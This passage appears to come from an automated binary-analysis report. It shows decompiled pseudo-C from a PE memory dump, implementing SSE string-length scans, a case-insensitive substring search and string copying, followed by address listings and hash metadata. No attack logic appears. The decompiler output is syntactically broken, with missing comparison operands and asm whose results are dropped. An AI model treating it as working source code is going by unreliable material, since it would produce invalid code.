													if(_t263 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t200;
											if( *_t200 == 0) {
												goto L52;
											}
											_v44 = _t344;
											_t62 = _t344 - 0x41; // 0x7fffffc0
											_t363 = _t62;
											__eflags = _t363 - 0x19;
											_t63 = _t344 + 0x20; // 0x80000021
											_v64 = _t363;
											_t302 =  >  ? _t344 : _t63;
											_t234 =  >  ? _t344 : _t63;
											_t303 = 0;
											__eflags = 0;
											_v68 =  >  ? _t344 : _t63;
											_v32 = _t259;
											_t235 = _t200;
											while(1) {
												_t264 =  *_t235;
												_t66 = _t264 - 0x41; // -65
												__eflags = _t66 - 0x19;
												_t67 = _t264 + 0x20; // 0x20
												_t265 =  <=  ? _t67 :  *_t235;
												__eflags = ( <=  ? _t67 :  *_t235) - _v68;
												if(( <=  ? _t67 :  *_t235) == _v68) {
													break;
												}
												_t303 = _t303 + 1;
												_t235 = _t235 + 1;
												__eflags =  *((char*)(_t303 + _t200));
												if( *((char*)(_t303 + _t200)) != 0) {
													continue;
												}
												goto L52;
											}
											_t346 = _v44;
											_t266 = _v32;
											__eflags = _t235;
											if(_t235 == 0) {
												goto L52;
											}
											_t305 = _t266 & 0x0000000f;
											_v40 = _t346 + 0x20;
											asm("pxor xmm0, xmm0");
											_v36 = _t200;
											_t368 =  ~_t305 + 0x10;
											__eflags = _t368;
											_v44 = _t346;
											_v32 = _t266;
											do {
												_t347 = _t305;
												__eflags = _t305;
												if(_t305 == 0) {
													L69:
													_v28 = _t368;
													_t272 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t272;
													_t369 = _v32;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t200;
														if(_t200 != 0) {
															break;
														}
														_t347 = _t347 + 0x10;
														__eflags = _t347 - _t272;
														if(_t347 < _t272) {
															continue;
														}
														_v32 = _t369;
														_t370 = _v28;
														__eflags = _t272 - 0x7fffffff;
														if(_t272 >= 0x7fffffff) {
															L77:
															_t272 = 0x7fffffff;
															L78:
															_v56 = _t272;
															_t206 = 0;
															__eflags = 0;
															_v60 = _t305;
															_v28 = _t370;
															_t273 = _v32;
															while(1) {
																_t306 =  *((char*)(_t206 + _t235));
																_v68 = _t235;
																_t236 =  *((char*)(_t206 + _t273));
																__eflags = _t306 - 0x61 - 0x19;
																_t307 =  <=  ? _t306 - 0x20 : _t306;
																__eflags = _t236 - 0x61 - 0x19;
																_t308 =  <=  ? _t306 - 0x20 : _t306;
																_t237 =  <=  ? _t236 - 0x20 : _t236;
																_t238 =  <=  ? _t236 - 0x20 : _t236;
																__eflags = _t308 - ( <=  ? _t236 - 0x20 : _t236);
																_t235 = _v68;
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t308;
																if(_t308 == 0) {
																	L83:
																	_t209 = _v36;
																	_t305 = _v60;
																	_t368 = _v28;
																	L84:
																	__eflags = _t235;
																	if(_t235 == 0) {
																		goto L52;
																	}
																	__eflags = _t305;
																	if(_t305 == 0) {
																		L89:
																		_t356 =  ~( ~_t305 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																		__eflags = _t356;
																		while(1) {
																			asm("movdqu xmm1, [ecx+edx]");
																			asm("pcmpeqb xmm1, xmm0");
																			asm("pmovmskb esi, xmm1");
																			__eflags = _t368;
																			if(_t368 != 0) {
																				break;
																			}
																			_t305 = _t305 + 0x10;
																			__eflags = _t305 - _t356;
																			if(_t305 < _t356) {
																				continue;
																			}
																			__eflags = _t356 - 0x7fffffff;
																			if(_t356 >= 0x7fffffff) {
																				L95:
																				_t356 = 0x7fffffff;
																				L96:
																				_t277 = _t209 & 0x0000000f;
																				__eflags = _t277;
																				if(_t277 == 0) {
																					L100:
																					_t317 =  ~( ~_t277 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																					__eflags = _t317;
																					while(1) {
																						asm("movdqu xmm1, [eax+ecx]");
																						asm("pcmpeqb xmm1, xmm0");
																						asm("pmovmskb esi, xmm1");
																						__eflags = _t368;
																						if(_t368 != 0) {
																							break;
																						}
																						_t277 = _t277 + 0x10;
																						__eflags = _t277 - _t317;
																						if(_t277 < _t317) {
																							continue;
																						}
																						__eflags = _t317 - 0x7fffffff;
																						if(_t317 >= 0x7fffffff) {
																							L106:
																							_t317 = 0x7fffffff;
																							L107:
																							_t240 = _t235 - _t209 + _t356;
																							__eflags = _t240;
																							_t376 = _a4;
																							_t241 =  <=  ? 0 : _t240;
																							__eflags = _t317 - _t241;
																							 *_t376 = 0;
																							_t242 =  <  ? _t317 : _t241;
																							_t318 = _t317 - _t242;
																							 *((intOrPtr*)(_t376 + 4)) = 0;
																							_t358 = _t209 + _t242;
																							__eflags = _t358;
																							_v64 = _t358;
																							if(_t358 == 0) {
																								L142:
																								_push(0x40);
																								_t232 = E00411030();
																								_t387 = _t387 + 4;
																								_t212 =  *_a4;
																								__eflags = _t212;
																								if(_t212 == 0) {
																									 *_t232 = 0;
																									goto L60;
																								}
																								__eflags = _t232;
																								if(_t232 == 0) {
																									L148:
																									_push(1);
																									_push(_t212);
																									E004110B0();
																									_t387 = _t387 + 8;
																									goto L60;
																								}
																								_t319 =  *_t212;
																								 *_t232 = _t319;
																								__eflags = _t319;
																								if(_t319 == 0) {
																									goto L148;
																								}
																								_t320 = 0;
																								__eflags = 0;
																								while(1) {
																									_t320 = _t320 + 1;
																									_t279 =  *((char*)(_t212 + _t320 * 2 - 1));
																									 *(_t232 + _t320 * 2 - 1) = _t279;
																									__eflags = _t279;
																									if(_t279 == 0) {
																										goto L148;
																									}
																									_t280 =  *((char*)(_t212 + _t320 * 2));
																									 *(_t232 + _t320 * 2) = _t280;
																									__eflags = _t280;
																									if(_t280 != 0) {
																										continue;
																									}
																									goto L148;
																								}
																								goto L148;
																							}
																							__eflags =  *(_t209 + _t242);
																							if( *(_t209 + _t242) == 0) {
																								goto L142;
																							}
																							__eflags = _t318;
																							if(_t318 != 0) {
																								L121:
																								_t129 = _t318 + 1; // 0x80000000
																								_t281 = _t129;
																								__eflags = _t281 - 0x40;
																								_t282 =  <=  ? 0x40 : _t281;
																								__eflags = _t282;
																								if(_t282 > 0) {
																									_t247 = (_t282 >> 5 >> 0x1a) + _t282 >> 6;
																									_t283 = _t282 & 0x8000003f;
																									__eflags = _t283;
																									if(_t283 < 0) {
																										_t283 = (_t283 - 0x00000001 | 0xffffffc0) + 1;
																										__eflags = _t283;
																									}
																									__eflags = _t283;
																									_t249 = _t247 + (0 | _t283 > 0x00000000) << 6;
																									_push(_t249);
																									_v68 = _t318;
																									_t217 = E00411030();
																									_t318 = _v68;
																									_t377 = _t217;
																									_t387 = _t387 + 4;
																									_t284 =  *_a4;
																									__eflags = _t284;
																									if(_t284 == 0) {
																										 *_t377 = 0;
																										goto L134;
																									} else {
																										__eflags = _t377;
																										if(_t377 == 0) {
																											L132:
																											_push(1);
																											_push(_t284);
																											_v68 = _t318;
																											E004110B0();
																											_t318 = _v68;
																											_t387 = _t387 + 8;
																											L134:
																											_t219 = _a4;
																											_t219[1] = _t249;
																											 *_t219 = _t377;
																											L135:
																											__eflags = _t377;
																											if(_t377 == 0) {
																												goto L61;
																											}
																											_t250 = _v64;
																											_t285 = 0;
																											while(1) {
																												_t220 =  *_t250;
																												_t285 = _t285 + 1;
																												 *_t377 = _t220;
																												__eflags = _t318;
																												if(_t318 == 0) {
																													goto L140;
																												}
																												__eflags = _t285 - _t318;
																												if(_t285 == _t318) {
																													 *(_t377 + 1) = 0;
																													goto L61;
																												}
																												L140:
																												__eflags = _t220;
																												if(_t220 == 0) {
																													goto L61;
																												}
																												_t377 = _t377 + 1;
																												_t250 = _t250 + 1;
																												__eflags = _t250;
																											}
																										}
																										_t222 =  *_t284;
																										 *_t377 = _t222;
																										__eflags = _t222;
																										if(_t222 == 0) {
																											goto L132;
																										}
																										_v68 = _t318;
																										_t359 = 0;
																										__eflags = 0;
																										while(1) {
																											_t359 = _t359 + 1;
																											_t223 =  *((char*)(_t284 + _t359 * 2 - 1));
																											 *(_t377 + _t359 * 2 - 1) = _t223;
																											__eflags = _t223;
																											if(_t223 == 0) {
																												break;
																											}
																											_t224 =  *((char*)(_t284 + _t359 * 2));
																											 *(_t377 + _t359 * 2) = _t224;
																											__eflags = _t224;
																											if(_t224 != 0) {
																												continue;
																											}
																											break;
																										}
																										_t318 = _v68;
																										goto L132;
																									}
																								}
																								_t377 = 0;
																								goto L135;
																							}
																							_t225 = _t209 + _t242;
																							_t252 = _t225 & 0x0000000f;
																							__eflags = _t252;
																							if(_t252 == 0) {
																								L114:
																								_t318 =  ~( ~_t252 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																								__eflags = _t318;
																								while(1) {
																									asm("movdqu xmm1, [eax+ebx]");
																									asm("pcmpeqb xmm1, xmm0");
																									asm("pmovmskb ecx, xmm1");
																									__eflags = 0;
																									if(0 != 0) {
																										break;
																									}
																									_t252 = _t252 + 0x10;
																									__eflags = _t252 - _t318;
																									if(_t252 < _t318) {
																										continue;
																									}
																									__eflags = _t318 - 0x7fffffff;
																									if(_t318 >= 0x7fffffff) {
																										L120:
																										_t318 = 0x7fffffff;
																										goto L121;
																									} else {
																										goto L118;
																									}
																									while(1) {
																										L118:
																										__eflags =  *((char*)(_t318 + _t225));
																										if( *((char*)(_t318 + _t225)) == 0) {
																											goto L121;
																										}
																										_t318 = _t318 + 1;
																										__eflags = _t318 - 0x7fffffff;
																										if(_t318 < 0x7fffffff) {
																											continue;
																										}
																										goto L120;
																									}
																									goto L121;
																								}
																								asm("bsf edx, ecx");
																								_t318 = _t318 + _t252;
																								goto L121;
																							}
																							_t318 = 0;
																							_t252 =  ~_t252 + 0x10;
																							__eflags = _t252;
																							while(1) {
																								__eflags =  *((char*)(_t318 + _t225));
																								if( *((char*)(_t318 + _t225)) == 0) {
																									goto L121;
																								}
																								_t318 = _t318 + 1;
																								__eflags = _t318 - _t252;
																								if(_t318 < _t252) {
																									continue;
																								}
																								goto L114;
																							}
																							goto L121;
																						} else {
																							goto L104;
																						}
																						while(1) {
																							L104:
																							__eflags =  *((char*)(_t317 + _t209));
																							if( *((char*)(_t317 + _t209)) == 0) {
																								goto L107;
																							}
																							_t317 = _t317 + 1;
																							__eflags = _t317 - 0x7fffffff;
																							if(_t317 < 0x7fffffff) {
																								continue;
																							}
																							goto L106;
																						}
																						goto L107;
																					}
																					asm("bsf edx, esi");
																					_t317 = _t317 + _t277;
																					goto L107;
																				}
																				_t317 = 0;
																				_t277 =  ~_t277 + 0x10;
																				__eflags = _t277;
																				while(1) {
																					__eflags =  *((char*)(_t317 + _t209));
																					if( *((char*)(_t317 + _t209)) == 0) {
																						goto L107;
																					}
																					_t317 = _t317 + 1;
																					__eflags = _t317 - _t277;
																					if(_t317 < _t277) {
																						continue;
																					}
																					goto L100;
																				}
																				goto L107;
																			} else {
																				goto L93;
																			}
																			while(1) {
																				L93:
																				__eflags =  *((char*)(_t356 + _t273));
																				if( *((char*)(_t356 + _t273)) == 0) {
																					goto L96;
																				}
																				_t356 = _t356 + 1;
																				__eflags = _t356 - 0x7fffffff;
																				if(_t356 < 0x7fffffff) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L96;
																		}
																		asm("bsf edi, esi");
																		_t356 = _t356 + _t305;
																		goto L96;
																	}
																	_t305 = _t368;
																	_t356 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags =  *((char*)(_t356 + _t273));
																		if( *((char*)(_t356 + _t273)) == 0) {
																			goto L96;
																		}
																		_t356 = _t356 + 1;
																		__eflags = _t356 - _t368;
																		if(_t356 < _t368) {
																			continue;
																		}
																		goto L89;
																	}
																	goto L96;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v56;
																if(_t206 < _v56) {
																	continue;
																}
																goto L83;
															}
															_v32 = _t273;
															_t309 = _v60;
															_t373 = _v28;
															_t275 = _t235 + 1;
															__eflags = _t275;
															if(_t275 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v40 : _v44;
															_t200 =  <=  ? _v40 : _v44;
															__eflags =  *(_t235 + 1);
															if( *(_t235 + 1) == 0) {
																goto L52;
															}
															_v60 = _t309;
															_v28 = _t373;
															while(1) {
																_t235 = _t235 + 1;
																_t275 = _t275 + 1;
																_t310 =  *_t235 & 0x000000ff;
																__eflags =  *((char*)(_t275 - 1)) + 0xffffffbf - 0x19;
																_t311 =  <=  ? _t310 + 0x20 : _t310;
																__eflags = ( <=  ? _t310 + 0x20 : _t310) - _t200;
																if(( <=  ? _t310 + 0x20 : _t310) == _t200) {
																	goto L165;
																}
																__eflags =  *_t275;
																if( *_t275 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L165;
														}
														_t200 = _v32;
														while(1) {
															__eflags =  *((char*)(_t272 + _t200));
															if( *((char*)(_t272 + _t200)) == 0) {
																break;
															}
															_t272 = _t272 + 1;
															__eflags = _t272 - 0x7fffffff;
															if(_t272 < 0x7fffffff) {
																continue;
															}
															_v32 = _t200;
															goto L77;
														}
														L160:
														_v32 = _t200;
														L161:
														__eflags = _t272;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														_t209 = _v36;
														_t273 = _v32;
														goto L84;
													}
													asm("bsf ecx, eax");
													_v32 = _t369;
													_t272 = _t272 + _t347;
													_t370 = _v28;
													goto L161;
												}
												_t200 = _v32;
												_t347 = _t368;
												_t272 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t272 + _t200));
													if( *((char*)(_t272 + _t200)) == 0) {
														goto L160;
													}
													_t272 = _t272 + 1;
													__eflags = _t272 - _t368;
													if(_t272 < _t368) {
														continue;
													}
													_v32 = _t200;
													goto L69;
												}
												goto L160;
												L165:
												_t305 = _v60;
												_t368 = _v28;
												__eflags = _t235;
											} while (_t235 != 0);
											goto L52;
										}
										goto L39;
									}
									_t227 =  *_t293;
									 *_t258 = _t227;
									__eflags = _t227;
									if(_t227 == 0) {
										goto L33;
									}
									_v60 = _t342;
									_t228 = 0;
									__eflags = 0;
									_v64 = _t361;
									_v68 = _t231;
									while(1) {
										_t228 = _t228 + 1;
										_t254 =  *((char*)(_t293 + _t228 * 2 - 1));
										 *(_t258 + _t228 * 2 - 1) = _t254;
										__eflags = _t254;
										if(_t254 == 0) {
											break;
										}
										_t255 =  *((char*)(_t293 + _t228 * 2));
										 *(_t258 + _t228 * 2) = _t255;
										__eflags = _t255;
										if(_t255 != 0) {
											continue;
										}
										break;
									}
									_t342 = _v60;
									_t361 = _v64;
									_t231 = _v68;
									goto L33;
								}
							}
							_t258 = _v52;
							goto L36;
						}
						_t329 = _t335 & 0x0000000f;
						__eflags = _t329;
						if(_t329 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t383 =  ~( ~_t329 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t383;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t184;
								if(_t184 != 0) {
									break;
								}
								_t329 = _t329 + 0x10;
								__eflags = _t329 - _t383;
								if(_t329 < _t383) {
									continue;
								}
								__eflags = _t383 - 0x7fffffff;
								if(_t383 >= 0x7fffffff) {
									L21:
									_t257 = 0x40;
									_t361 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t383 + _t335));
									if( *((char*)(_t383 + _t335)) == 0) {
										break;
									}
									_t383 = _t383 + 1;
									__eflags = _t383 - 0x7fffffff;
									if(_t383 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L167:
								__eflags = _t361 - 0xfffffffe;
								if(_t361 != 0xfffffffe) {
									_t257 = 0x40;
								} else {
									 *_t335 = 0;
									_t257 = _v48;
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t361 = _t383 + _t329;
							goto L167;
						}
						_t361 = 0;
						_t329 =  ~_t329 + 0x10;
						__eflags = _t329;
						while(1) {
							__eflags =  *((char*)(_t361 + _t335));
							if( *((char*)(_t361 + _t335)) == 0) {
								goto L167;
							}
							_t361 = _t361 + 1;
							__eflags = _t361 - _t329;
							if(_t361 < _t329) {
								continue;
							}
							goto L15;
						}
						goto L167;
					}
					_t190 =  &_v52;
					goto L37;
				}
				if(_t335 == 0) {
					L6:
					_push(1);
					_push(_t183);
					E004110B0();
					_t387 = _t387 + 8;
					goto L8;
				}
				_t331 =  *_t183;
				 *_t335 = _t331;
				if(_t331 == 0) {
					goto L6;
				}
				_t289 = 0;
				while(1) {
					_t289 = _t289 + 1;
					_t332 =  *((char*)(_t183 + _t289 * 2 - 1));
					 *((char*)(_t335 + _t289 * 2 - 1)) = _t332;
					if(_t332 == 0) {
						goto L6;
					}
					_t333 =  *((char*)(_t183 + _t289 * 2));
					 *((char*)(_t335 + _t289 * 2)) = _t333;
					if(_t333 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x004226be
0x004226c2
0x004226c4
0x004226c8
0x004226cf
0x004226d1
0x004226d4
0x004226da
0x00422711
0x00422714
0x00422714
0x00422718
0x00422720
0x00422726
0x00422731
0x00422733
0x00422e47
0x00422e4c
0x004227ad
0x004227b2
0x004227b2
0x004227b5
0x004227b8
0x004227bb
0x004227bd
0x004227d2
0x004227d5
0x004227d5
0x004227db
0x004227e3
0x004227e3
0x004227e3
0x004227e6
0x004227ed
0x004227f0
0x004227f6
0x004227f8
0x004227fb
0x004227ff
0x00422801
0x00422856
0x00000000
0x00422803
0x00422803
0x00422805
0x00422841
0x00422841
0x00422843
0x00422844
0x00422848
0x0042284d
0x00422851
0x00422859
0x00422859
0x0042285d
0x00422861
0x00422865
0x00422868
0x0042286e
0x00422873
0x00422873
0x00422877
0x00422880
0x00422880
0x00422885
0x00422887
0x00422889
0x00422891
0x00422893
0x00422899
0x0042289d
0x004228d7
0x00422983
0x00422983
0x00422986
0x00422988
0x0042298f
0x0042298f
0x00422991
0x00422995
0x0042299f
0x004229a3
0x004229b3
0x004229b3
0x004228a1
0x004228c7
0x004228c7
0x004228c9
0x004228ca
0x004228cf
0x00000000
0x004228cf
0x004228a3
0x004228a6
0x004228aa
0x00000000
0x00000000
0x004228ac
0x004228ae
0x004228ae
0x004228af
0x004228b4
0x004228ba
0x00000000
0x00000000
0x004228bc
0x004228c0
0x004228c5
0x00000000
0x00000000
0x00000000
0x004228c5
0x00000000
0x004228ae
0x00422879
0x0042287e
0x004228df
0x004228e1
0x004228e3
0x0042292c
0x0042292c
0x00422931
0x00422933
0x00422935
0x0042293d
0x0042293f
0x00422945
0x00422947
0x00422949
0x00422980
0x00000000
0x00422980
0x0042294b
0x0042294d
0x00422973
0x00422973
0x00422975
0x00422976
0x0042297b
0x00000000
0x0042297b
0x0042294f
0x00422952
0x00422954
0x00422956
0x00000000
0x00000000
0x00422958
0x00422958
0x0042295a
0x0042295a
0x0042295b
0x00422960
0x00422964
0x00422966
0x00000000
0x00000000
0x00422968
0x0042296c
0x0042296f
0x00422971
0x00000000
0x00000000
0x00000000
0x00422971
0x00000000
0x0042295a
0x004228e5
0x004228e8
0x00000000
0x00000000
0x004228ea
0x004228ee
0x004228ee
0x004228f1
0x004228f4
0x004228f7
0x004228fb
0x004228fe
0x00422901
0x00422901
0x00422903
0x00422906
0x0042290a
0x0042290c
0x0042290c
0x0042290f
0x00422912
0x00422915
0x00422918
0x0042291b
0x0042291e
0x00000000
0x00000000
0x00422924
0x00422925
0x00422926
0x0042292a
0x00000000
0x00000000
0x00000000
0x0042292a
0x004229b6
0x004229ba
0x004229be
0x004229c0
0x00000000
0x00000000
0x004229cb
0x004229ce
0x004229d6
0x004229da
0x004229de
0x004229de
0x004229e1
0x004229e5
0x004229e9
0x004229e9
0x004229eb
0x004229ed
0x00422a0a
0x00422a16
0x00422a1a
0x00422a1a
0x00422a20
0x00422a24
0x00422a24
0x00422a29
0x00422a2d
0x00422a31
0x00422a33
0x00000000
0x00000000
0x00422a39
0x00422a3c
0x00422a3e
0x00000000
0x00000000
0x00422a40
0x00422a44
0x00422a48
0x00422a4e
0x00422a6b
0x00422a6b
0x00422a70
0x00422a70
0x00422a74
0x00422a74
0x00422a76
0x00422a7a
0x00422a7e
0x00422a82
0x00422a82
0x00422a86
0x00422a89
0x00422a90
0x00422a99
0x00422a9c
0x00422a9f
0x00422aa5
0x00422aa8
0x00422aab
0x00422aad
0x00422ab0
0x00000000
0x00000000
0x00422abc
0x00422abe
0x00422ac7
0x00422ac7
0x00422acb
0x00422acf
0x00422ad3
0x00422ad3
0x00422ad5
0x00000000
0x00000000
0x00422adb
0x00422add
0x00422aee
0x00422afa
0x00422afa
0x00422b00
0x00422b00
0x00422b05
0x00422b09
0x00422b0d
0x00422b0f
0x00000000
0x00000000
0x00422b15
0x00422b18
0x00422b1a
0x00000000
0x00000000
0x00422b1c
0x00422b22
0x00422b33
0x00422b33
0x00422b38
0x00422b3a
0x00422b3a
0x00422b3d
0x00422b51
0x00422b5d
0x00422b5d
0x00422b63
0x00422b63
0x00422b68
0x00422b6c
0x00422b70
0x00422b72
0x00000000
0x00000000
0x00422b78
0x00422b7b
0x00422b7d
0x00000000
0x00000000
0x00422b7f
0x00422b85
0x00422b96
0x00422b96
0x00422b9b
0x00422b9f
0x00422ba3
0x00422ba5
0x00422ba8
0x00422bab
0x00422bad
0x00422baf
0x00422bb2
0x00422bb4
0x00422bb7
0x00422bb7
0x00422bb9
0x00422bbd
0x00422d0b
0x00422d0b
0x00422d12
0x00422d14
0x00422d1a
0x00422d1c
0x00422d1e
0x00422d58
0x00000000
0x00422d58
0x00422d20
0x00422d22
0x00422d48
0x00422d48
0x00422d4a
0x00422d4b
0x00422d50
0x00000000
0x00422d50
0x00422d24
0x00422d27
0x00422d29
0x00422d2b
0x00000000
0x00000000
0x00422d2d
0x00422d2d
0x00422d2f
0x00422d2f
0x00422d30
0x00422d35
0x00422d39
0x00422d3b
0x00000000
0x00000000
0x00422d3d
0x00422d41
0x00422d44
0x00422d46
0x00000000
0x00000000
0x00000000
0x00422d46
0x00000000
0x00422d2f
0x00422bc3
0x00422bc7
0x00000000
0x00000000
0x00422bcd
0x00422bcf
0x00422c36
0x00422c3b
0x00422c3b
0x00422c3e
0x00422c41
0x00422c44
0x00422c46
0x00422c59
0x00422c5c
0x00422c5c
0x00422c62
0x00422c6a
0x00422c6a
0x00422c6a
0x00422c6d
0x00422c74
0x00422c77
0x00422c78
0x00422c7c
0x00422c81
0x00422c85
0x00422c87
0x00422c8d
0x00422c8f
0x00422c91
0x00422cd6
0x00000000
0x00422c93
0x00422c93
0x00422c95
0x00422cc1
0x00422cc1
0x00422cc3
0x00422cc4
0x00422cc8
0x00422ccd
0x00422cd1
0x00422cd9
0x00422cd9
0x00422cdc
0x00422cdf
0x00422ce1
0x00422ce1
0x00422ce3
0x00000000
0x00000000
0x00422ce9
0x00422ced
0x00422cf3
0x00422cf3
0x00422cf6
0x00422cf7
0x00422cf9
0x00422cfb
0x00000000
0x00000000
0x00422cfd
0x00422cff
0x00422d60
0x00000000
0x00422d60
0x00422d01
0x00422d01
0x00422d03
0x00000000
0x00000000
0x00422cf1
0x00422cf2
0x00422cf2
0x00422cf2
0x00422cf3
0x00422c97
0x00422c9a
0x00422c9c
0x00422c9e
0x00000000
0x00000000
0x00422ca0
0x00422ca3
0x00422ca3
0x00422ca5
0x00422ca5
0x00422ca6
0x00422cab
0x00422caf
0x00422cb1
0x00000000
0x00000000
0x00422cb3
0x00422cb7
0x00422cba
0x00422cbc
0x00000000
0x00000000
0x00000000
0x00422cbc
0x00422cbe
0x00000000
0x00422cbe
0x00422c91
0x00422c48
0x00000000
0x00422c48
0x00422bd1
0x00422bd5
0x00422bd5
0x00422bd8
0x00422bec
0x00422bf8
0x00422bf8
0x00422bfe
0x00422bfe
0x00422c03
0x00422c07
0x00422c0b
0x00422c0d
0x00000000
0x00000000
0x00422c13
0x00422c16
0x00422c18
0x00000000
0x00000000
0x00422c1a
0x00422c20
0x00422c31
0x00422c31
0x00000000
0x00000000
0x00000000
0x00000000
0x00422c22
0x00422c22
0x00422c22
0x00422c26
0x00000000
0x00000000
0x00422c28
0x00422c29
0x00422c2f
0x00000000
0x00000000
0x00000000
0x00422c2f
0x00000000
0x00422c22
0x00422d69
0x00422d6c
0x00000000
0x00422d6c
0x00422bdc
0x00422bde
0x00422bde
0x00422be1
0x00422be1
0x00422be5
0x00000000
0x00000000
0x00422be7
0x00422be8
0x00422bea
0x00000000
0x00000000
0x00000000
0x00422bea
0x00000000
0x00000000
0x00000000
0x00000000
0x00422b87
0x00422b87
0x00422b87
0x00422b8b
0x00000000
0x00000000
0x00422b8d
0x00422b8e
0x00422b94
0x00000000
0x00000000
0x00000000
0x00422b94
0x00000000
0x00422b87
0x00422d73
0x00422d76
0x00000000
0x00422d76
0x00422b41
0x00422b43
0x00422b43
0x00422b46
0x00422b46
0x00422b4a
0x00000000
0x00000000
0x00422b4c
0x00422b4d
0x00422b4f
0x00000000
0x00000000
0x00000000
0x00422b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00422b24
0x00422b24
0x00422b24
0x00422b28
0x00000000
0x00000000
0x00422b2a
0x00422b2b
0x00422b31
0x00000000
0x00000000
0x00000000
0x00422b31
0x00000000
0x00422b24
0x00422d7d
0x00422d80
0x00000000
0x00422d80
0x00422adf
0x00422ae1
0x00422ae1
0x00422ae3
0x00422ae3
0x00422ae7
0x00000000
0x00000000
0x00422ae9
0x00422aea
0x00422aec
0x00000000
0x00000000
0x00000000
0x00422aec
0x00000000
0x00422ae3
0x00422ac0
0x00422ac1
0x00422ac5
0x00000000
0x00000000
0x00000000
0x00422ac5
0x00422d87
0x00422d8b
0x00422d8f
0x00422d95
0x00422d95
0x00422d96
0x00000000
0x00000000
0x00422d9c
0x00422da5
0x00422daa
0x00422dad
0x00422db1
0x00000000
0x00000000
0x00422db7
0x00422dbb
0x00422dbf
0x00422dbf
0x00422dc0
0x00422dc1
0x00422dcb
0x00422dd1
0x00422dd4
0x00422dd6
0x00000000
0x00000000
0x00422dd8
0x00422ddb
0x00000000
0x00000000
0x00000000
0x00422ddd
0x00000000
0x00422dbf
0x00422a50
0x00422a54
0x00422a54
0x00422a58
0x00000000
0x00000000
0x00422a5e
0x00422a5f
0x00422a65
0x00000000
0x00000000
0x00422a67
0x00000000
0x00422a67
0x00422de2
0x00422de2
0x00422de6
0x00422de6
0x00422de8
0x00000000
0x00000000
0x00422dee
0x00000000
0x00000000
0x00422df4
0x00422df8
0x00000000
0x00422df8
0x00422e01
0x00422e04
0x00422e08
0x00422e0a
0x00000000
0x00422e0a
0x004229ef
0x004229f3
0x004229f5
0x004229f5
0x004229f7
0x004229f7
0x004229fb
0x00000000
0x00000000
0x00422a01
0x00422a02
0x00422a04
0x00000000
0x00000000
0x00422a06
0x00000000
0x00422a06
0x00000000
0x00422e10
0x00422e10
0x00422e14
0x00422e18
0x00422e18
0x00000000
0x00422e20
0x00000000
0x0042287e
0x00422807
0x0042280a
0x0042280c
0x0042280e
0x00000000
0x00000000
0x00422810
0x00422814
0x00422814
0x00422816
0x0042281a
0x0042281d
0x0042281d
0x0042281e
0x00422823
0x00422827
0x00422829
0x00000000
0x00000000
0x0042282b
0x0042282f
0x00422832
0x00422834
0x00000000
0x00000000
0x00000000
0x00422834
0x00422836
0x0042283a
0x0042283e
0x00000000
0x0042283e
0x00422801
0x004227bf
0x00000000
0x004227bf
0x0042273b
0x0042273b
0x0042273e
0x00422756
0x0042275a
0x00422766
0x00422766
0x0042276c
0x0042276c
0x00422771
0x00422775
0x00422779
0x0042277b
0x00000000
0x00000000
0x00422781
0x00422784
0x00422786
0x00000000
0x00000000
0x00422788
0x0042278e
0x004227a3
0x004227a3
0x004227a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00422790
0x00422790
0x00422790
0x00422794
0x00000000
0x00000000
0x0042279a
0x0042279b
0x004227a1
0x00000000
0x00000000
0x00000000
0x004227a1
0x00422e25
0x00422e25
0x00422e28
0x00422e36
0x00422e2a
0x00422e2a
0x00422e2d
0x00422e2d
0x00000000
0x00422e28
0x00422e40
0x00422e43
0x00000000
0x00422e43
0x00422742
0x00422744
0x00422744
0x00422747
0x00422747
0x0042274b
0x00000000
0x00000000
0x00422751
0x00422752
0x00422754
0x00000000
0x00000000
0x00000000
0x00422754
0x00000000
0x00422747
0x00422728
0x00000000
0x00422728
0x004226de
0x00422704
0x00422704
0x00422706
0x00422707
0x0042270c
0x00000000
0x0042270c
0x004226e0
0x004226e3
0x004226e7
0x00000000
0x00000000
0x004226e9
0x004226eb
0x004226eb
0x004226ec
0x004226f1
0x004226f7
0x00000000
0x00000000
0x004226f9
0x004226fd
0x00422702
0x00000000
0x00000000
0x00000000
0x00422702
0x00000000

Strings

@, xrefs: 00422718

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: 90e1575dd16ba6efc7ee9fedbe57c3b02170383e3182ff5ce1a1e7147194846e
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: FC326D70B083A26BD725CE29958032B7BD26FC5310F9D876FD8955B391DAB8CD41C38A

Uniqueness

Uniqueness Score: -1.00%

